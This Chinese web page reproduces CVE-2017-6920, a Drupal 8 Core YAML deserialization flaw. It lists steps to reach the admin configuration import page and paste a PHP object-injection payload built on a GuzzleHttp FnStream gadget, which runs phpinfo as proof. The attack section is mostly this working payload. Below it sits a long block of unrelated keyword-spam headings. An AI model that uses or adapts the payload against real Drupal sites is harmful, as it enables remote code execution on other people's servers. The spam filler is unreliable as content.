Drupal Core 8 PECL YAML 反序列化任意
发表于:2024-09-22 作者:千家信息网编辑
千家信息网最后更新 2024年09月22日,漏洞背景:2017年6月21日,Drupal官方发布了一个编号为CVE-2017- 6920 的漏洞,影响为Critical。这是Drupal Core的YAML解析器处理不当所导致的一个远程代码执行
千家信息网最后更新 2024年09月22日Drupal Core 8 PECL YAML 反序列化任意
漏洞背景:
2017年6月21日,Drupal官方发布了一个编号为CVE-2017- 6920 的漏洞,影响为Critical。这是Drupal Core的YAML解析器处理不当所导致的一个远程代码执行漏洞,影响8.x的Drupal Core。
漏洞复现:
1.打开网页先登录一个管理员账号。
2.访问 http://你的ip:8080/admin/config/development/configuration/single/import
3.然后如下图所示:第二个随便填。
poc:!php/object "O:24:\"GuzzleHttp\Psr7\FnStream\":2:{s:33:\"\0GuzzleHttp\Psr7\FnStream\0methods\";a:1:{s:5:\"close\";s:7:\"phpinfo\";}s:9:\"_fn_close\";s:7:\"phpinfo\";}"
4.然后执行最下面的import,会再出来个phpinto就代表成了。
漏洞
影响
不当
处理不当
代码
代表
官方
管理员
网页
背景
账号
这是
面的
处理
登录
管理
序列
数据库的安全要保护哪些东西
数据库安全各自的含义是什么
生产安全数据库录入
数据库的安全性及管理
数据库安全策略包含哪些
海淀数据库安全审计系统
建立农村房屋安全信息数据库
易用的数据库客户端支持安全管理
连接数据库失败ssl安全错误
数据库的锁怎样保障安全
怎么找一些分类数据库
关于网络安全培训心得体会
exp数据库导出
企业专利数据库的好处
4k纸网络安全手抄报初一
服务器主机设置无线网卡
开发人员数据库权限
清远市APP软件开发公司
关于校园网络安全名人名言
丝路传说服务器有多少人
dns服务器存在问题打不开网页
电脑没内存之后数据库会怎样
服务器无法启动读取数据
广东互联网信息科技
ctf网络安全大赛kk视频
互联网模式下的金融科技
没有数据库应用可以运行吗
软件开发部分放在哪个部门
交通网络安全事件
服务器机柜生产投资测算
服务器管理岗位技能规范
高新区营销网络技术收费
体质与健康数据库
服务器的并行数量
ctf网络安全大赛kk视频
电脑网络安全防护怎么进
网络下数据库的安全性
广西 网络安全 责任制
手绘地图软件开发
软件开发困难什么原因